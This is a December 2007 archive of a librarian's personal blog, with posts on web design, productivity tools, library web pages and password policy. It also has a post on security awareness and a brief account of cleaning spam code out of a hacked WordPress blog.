Monthly Archives: December 2007

Get in shape

Um, yeah, not that kind of shape – I’m the last person to be giving *that* advice – but rather the kind of shape that makes for interesting and harmonious design on the web. In the 24 ways blog – 24 daily articles on some aspect of web design/programming, active during the last few holiday seasons – there was an article on the shape of things that make up a website. The author talks about how to make sure that the general shape of your navigational elements, call-outs, informational boxes and the like are working together to make a web page that just works. He talks first about a couple of shapes created by header graphics and navigation that just don’t work – they don’t look like they belong together and they don’t look “right”. Then he goes into several different design concepts and how to apply them to the shapes on your pages. Consistency, Balance and Completion are all discussed, and illustrated, to show you the difference between shapes that are just slapped on a page and forgotten and shapes that make a page look finished and well-put-together.
It’s an interesting read and reminded me that the “squint test” (where you squint up your eyes until you can’t see the words on the page, just the shapes that your words and colors make up) is an important step in the design process! The shapes that make up your headers, navigation and content areas should be in harmony and should work together – not be fighting one another for your visitors’ attention.

My crafty director

The director of my library makes homemade christmas ornaments, did you know that? I didn’t – but when I came into work today, there was a pretty, handmade ornament sitting on my desk. It looks like everyone on staff got one! That’s a lot of work that went into these things… He has a picture of some of them on his flickr account
Christmas Ornaments
I took a picture of the one he gave me (with my phone – my camera was not at hand…) and here is my ornament:
My ornament
What a nice gift from my boss!

CERIAS Weblogs » Security Myths and Passwords

Yesterday, during an interesting conversation on Twitter upon which I shamelessly eavesdropped, the concept of frequently changing passwords being a security vulnerability came up. One of the participants in the conversation (attribution below) posted an article about that very topic. Of course, being a curious sort (why else would I be eavesdropping on other people’s conversations in Twitter? Just because they scroll past the edge of my browser window??), I went to check the article out. CERIAS Weblogs » Security Myths and Passwords is the first of a two-part article that looks, in depth, at why the tried-and-true advice of changing your password frequently may not be the best policy for your organization. I’ve got to say that the arguments were persuasive. We have issues with our staff when it comes to changing passwords – mostly because our part-time staff rarely log into a computer using their own user/pass combo. They use a generic one that works on the desk machines and, as such, they don’t get notices that their password is about to expire. They just can’t log into the web-based email application one day and don’t necessarily realize why! Others seem to have a hard time coming up with a password that is sufficiently complex for our system and still memorable (ok, maybe not just others – I’ve hit this particular issue myself…). Not that I’m about to do away with our password changing policy tomorrow – but the post makes some good points!
What I really liked about the post was the methodical way in which the author made his points. He goes through each of the common ways that people “lose” their passwords to bad guys and shows that most of them don’t seem to be mitigated by the regularly changed password policy. He claims that the “best practice” in this case might not be the best practice for every organization and he suggests that each organization undertake a risk analysis to determine if the frequently changing password policy actually does minimize their risk of getting hacked.
As I mentioned earlier, there is a second part to the article (linked at the bottom of the first post) in which he clarifies some of the questions, concerns and arguments made in the 120 comments left on the first part. Both posts are well worth reading if you have a say in your organization’s security policy. Like I said, I’m not sure ditching the policy is the best choice for us – but it got me thinking about what might actually be the best choice, security wise, for our library…

From the Travelin’ Librarian, Michael Sauers, via Twitter.

Todoist

I’ve been using the free version of Todoist for a bit now and figured I wouldn’t bother blogging about it. There has been a lot written about it already, and I didn’t think that I had much to add. I use it, it’s handy, I’m done. But, as you can see, something has changed that prompted me to write this post. Chains. That’s what has changed – chains.
The folks at Todoist have taken a productivity tip from Jerry Seinfeld and made it into a really nifty little feature on their software. If you enter a recurring task and add the text “!chain” to it, the software will create a chain of boxes that show when the task has been done. This seems like a great way to reinforce any new habit you are trying to create! It’s only available to paid subscribers (those willing to part with $3 a month) but there is a free preview for the free accounts. That (and the colored tag labels) prompted me to shell out the $3 and get a paid account… So far, I have my task list reminding me to write a blog post every 3 days. Let’s see if I can get an unbroken chain of completed tasks for my “blog” project!!

New pages @ the library

Yesterday I went on a web page creating tear! I confirmed that our Outreach department had finished putting in all the information into the Bookmobile’s Google Maps account and I embedded the result into our Bookmobile schedule page. For now, the route information is hand entered by the industrious Outreach staff, but I’ve got a test map in that same account that uses an XML file to get the same results. The next 3-month schedule will use XML to populate the map – that way, all the Outreach staff has to do is change the dates/times in a text file (or a web interface – if I’m feeling ambitious…) and the map is updated and current!
I also finished up a page describing how to access the library’s eAudiobook collection (we get ours through netLibrary) and have downloaded and prepared a “banner ad” for the front page to send curious visitors that way. The collection is already receiving great feedback from our patrons, so the big push now is to get people to realize we offer it!
Finally, I noticed a fresh blog post from Bobbi that pointed to that little bit of red text in the top right corner of our Gmail accounts that asks users to “share your Gmail story”. It encourages folks to create videos telling about their use of Gmail and how great it is – then post them to YouTube. She’s going to steal that idea for us! I know we have at least one staff member who regularly posts original videos to YouTube (using his LL2.0 created blog – how cool is that?), so there has to be other video camera happy folks around here who would be willing to let us know how, why or where they use our services – and how great we are, of course!

Security Awareness

I was just reading through an article on Security Search called “Sophisticated spam, employee errors continue unabated” and remembered that I’d promised to do a post on the whole idea of Security Awareness. The comment in the above article that made me think of this was:

You could have the best practices in place … but we find in more cases than not that its human error, not machine error that causes the problems you see today

There was also another incident earlier this week – a local bank got hit hard by a phishing scam. This one was particularly subtle in that it (at least the email portion of it) didn’t have a link to click – it had a phone number to call. Computer professionals tell their co-workers not to ever click on links in emails – do we tell them not to ever call numbers sent to them by an email?

Wikipedia defines Security Awareness as:

knowledge and attitude members of an organization possess regarding the protection of the physical and, especially, information assets of that organization

You’ll notice that there is not much in the way of technology in that definition. Security awareness doesn’t deal with spam filters, network intrusion detector program or port scanning software – it deals with the education of the front-line, everyday users of our computer networks who have their own jobs to do and don’t have time to keep on top of every security blog, white paper and announcement mailing list out there. Our job, as computer professionals, is to keep on top of that stuff – and pass what we learn on to the people who use our networks. If we don’t, all of the high-tech scanners, detectors and filters won’t help us when one of our co-workers clicks a link, or calls a phone number, in an email and infects the system from the inside.

The general “themes” of security awareness are:

  • nature and proper handling of sensitive materials
  • proper methods for securing sensitive materials on a computer (password policy, authentication, etc.)
  • other security concerns (phishing, malware, social engineering, etc.)
  • physical security issues
  • consequences of following proper security procedures

All of these – even the first two – are very applicable to libraries. We aren’t working in a big corporation with company secrets that can make or break next quarter’s profits – but we are in a position of trust with our patrons to make sure that the information they give us (names, addresses, books they have checked out, etc.) stays safe and outside the reach of anyone who doesn’t have a legitimate court order. We, however, are also in the somewhat unique position of having all of that confidential and sensitive material to keep to ourselves, while also being a place for people to go to get information and use computing resources that we have to make both available and make secure. All of this takes both attention to detail and flexibility from the folks responsible for a library’s network! It also takes education of the *entire* staff as to what all of the things listed above are. They need to be aware of what information we can and can’t give out about patrons and other staff members. They need to be aware of what a social engineering attack is and how to recognize one when they are being scammed. They need to understand that each and every one of them has the power to bring down the library’s network (including the ability to check out books, look up items in the catalog, etc.) by the decisions that they make. The responsibility for making sure they understand this? That part is up to the computer professionals, network administrators and even the computer-savvy staff who work in our organizations.

And after saying all of that, I’ll now pimp the latest project that my library, MRRL, has going. Bobbi and I will be doing a Library Learning 2.1 program that offers a blog posting a week on a particular application or topic that deals with – in some way – Web 2.0. I’m going to focus on posting a regular (maybe monthly, maybe every other month) treatise on some aspect of staying secure while playing with all of these nifty 2.0 toys – and this program is open to both the public and the staff! Any extra awareness about security-related topics is good, so I’m hoping that by making security issues part of this program, I can improve the security awareness of both the staff that use the internal network and the patrons that use our external network (PCC and wireless).

Hacked!

I’d just finished writing up my post for Monday morning on Security Awareness when I happened to check my twitter feed. In it, I noticed Jay Datema (my editor at LJ for the article I wrote for them) let me know that my blog had been hit by spammers and – even more helpfully – he pointed me to a resource to get it fixed fast. I checked out the WordPress Footer Follies post he referenced and found the fix! Since there were a few differences between our fixes, I’ll post my abbreviated solution here as well. Read the post above for more commentary on the solution!
First, I found the call to an outside file in my footer and deleted it, found another one in my main index.php page, and deleted that one too. I looked for the extra files in wp-includes that Scott mentioned in his post and didn’t see ‘em. I did find the extra code in the default-filters.php file in that directory, though, so I got rid of it. After making sure I got it all, I downloaded the most recent copy of WordPress (I know – should have done that a long time ago…) and uploaded it. I upgraded the blog, then started changing passwords. Now my domain, FTP and WordPress passwords are all different. And no, I won’t tell you what they are.

Now, I’ll be keeping a close eye on the blog and I’ll be upgrading much more regularly. I’d let it go to long, and I paid for it. If you haven’t upgraded – do it now!

Followup to PLE post

The Ed Techie: My personal work/leisure/learning environment mentions the idea of a Personal Work Environment (PWE) that is quite similar to a PLE (personal learning environment for those not familiar with the term or my earlier post). He has a nifty graphic showing all of the Web 2.0ish stuff he uses in his personal environment (not work-provided like Outlook, just what he uses beyond the work-provided tools). He also comments that it’s really a combination PLE/PWE/PRE (personal recreation environment) because he can do all three things at once with many of these tools. While I’ve taken to the idea of a PLE for a couple of topics I want to either stay on top of (Web 2.0) or learn more about (Security), the idea of compiling and using a PWE is pretty cool as well! The funny part about all this – I found the link via my recently set up Web 2.0 PLE…

I decided, by the way, on Protopages for my PL/W/RE. It’s at http://www.protopage.com/webgoddess if you wanna check it out. So far, the Web 2.0 and Security tabs are the only ones I’ve customized!

Gmail productivity

Have you all heard about the new shortcuts in Gmail? There are a few new things in their recent code roll-out, but the ] and [ shortcut keys one is one I’m finding myself using ALL THE TIME. My Gmail workflow generally has me starting at the bottom (looking at oldest emails first) and working my way to the top. Now, all I have to do is start at the bottom, press the “n” key to get to the next email in the thread, then press the “]” key to go up to the next oldest email in my inbox (and the “[” key goes down to the next youngest email). I can’t tell you how much quicker my email processing is now!

Getting even more things done. Sort of…

ClearContext has come out with version 4 of the IMS (Information Management System, I think – too lazy to look it up right now) just in time to revitalize my personal implementation of the GTD system. I needed it, too! I’ve managed to get my electronic clutter taken care of – zero inbox clutter in either work or Gmail accounts, yeah me! – but my physical clutter is still sitting on my desk, waiting for attention… Anyway, the point behind this post is not to brag about the fact that I have NO waiting-for-action emails in my inbox any more (ohhh – can I say that one more time – I’m email free right now!!) but to point you all to the newest edition of this product. It ain’t cheap – $90 for the software, $25 or so to upgrade from version 3, but it’s pretty sweet!
The new feature that prompted me to shell out $25 more dollars on it is the new dashboard. It presents messages, appointments and tasks/actions all in one place, filterable by topic (project) or category (context) or both. This is pretty handy – before I go talk to my boss now (Hi, Bill!) I can filter by my “boss” context, read through recent emails or tasks that I’ve associated with him and have all the information I need. Theoretically. If I manage to keep it up. But it’s too new for me to be thinking so negatively! I’m going to keep on top of my various inboxes and keep everything running this time – not least because playing with the dashboard of this product is so much fun…